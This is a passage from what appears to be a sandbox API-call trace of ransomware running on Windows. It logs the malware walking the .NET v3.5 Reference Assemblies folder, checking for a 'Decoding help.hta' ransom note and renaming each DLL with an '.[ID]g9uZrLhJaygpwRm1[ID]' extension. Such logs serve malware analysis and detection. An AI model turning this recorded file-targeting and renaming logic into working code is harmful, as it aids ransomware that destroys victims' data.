assemblies\\microsoft\\framework\\v3.5\\system.componentmodel.dataannotations.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.588] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6651e86, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb6651e86, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb6651e86, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Core.dll", cAlternateFileName="")) returned 1 [0057.588] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.588] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.588] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.588] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Core.dll") returned -1 [0057.588] lstrlenW (lpString="System.Core.dll") returned 15 [0057.588] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.588] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.588] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Core.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll" [0057.588] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll" [0057.588] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.core.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.core.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.588] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb662bd26, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb662bd26, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb662bd26, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.DataSetExtensions.dll", cAlternateFileName="")) returned 1 [0057.588] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.588] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.588] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.589] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Data.DataSetExtensions.dll") returned -1 [0057.589] lstrlenW (lpString="System.Data.DataSetExtensions.dll") returned 33 [0057.589] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.589] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.589] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.589] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Data.DataSetExtensions.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll" [0057.589] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll" [0057.589] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.589] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.datasetextensions.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.datasetextensions.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.589] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb64fb223, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb64fb223, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb64fb223, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x38000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Entity.Design.dll", cAlternateFileName="")) returned 1 [0057.589] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.589] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.589] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.589] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.589] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Data.Entity.Design.dll") returned -1 [0057.589] lstrlenW (lpString="System.Data.Entity.Design.dll") returned 29 [0057.589] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.589] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.589] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.589] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Data.Entity.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll" [0057.589] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll" [0057.589] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.589] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.design.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.design.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.590] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb462f54b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb462f54b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb46a196b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2bf000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Entity.dll", cAlternateFileName="")) returned 1 [0057.590] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.590] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.590] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.590] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.590] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Data.Entity.dll") returned -1 [0057.590] lstrlenW (lpString="System.Data.Entity.dll") returned 22 [0057.590] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.590] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.590] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Data.Entity.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll" [0057.590] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll" [0057.590] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.590] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.590] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb64fb223, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb64fb223, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb6521384, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Linq.dll", cAlternateFileName="")) returned 1 [0057.590] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.590] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.590] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.590] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.591] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Data.Linq.dll") returned -1 [0057.591] lstrlenW (lpString="System.Data.Linq.dll") returned 20 [0057.591] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.591] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.591] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Data.Linq.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll" [0057.591] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll" [0057.591] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.591] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.linq.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.linq.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.591] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb65937a4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb65937a4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb65b9905, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x71000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Services.Client.dll", cAlternateFileName="")) returned 1 [0057.591] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.591] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.591] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.591] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Data.Services.Client.dll") returned -1 [0057.591] lstrlenW (lpString="System.Data.Services.Client.dll") returned 31 [0057.591] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.591] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.592] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.592] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Data.Services.Client.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll" [0057.592] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll" [0057.592] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.client.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.client.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.592] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb46093ea, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb46093ea, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb462f54b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x28000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Services.Design.dll", cAlternateFileName="")) returned 1 [0057.592] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.592] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.592] lstrcatW (in: 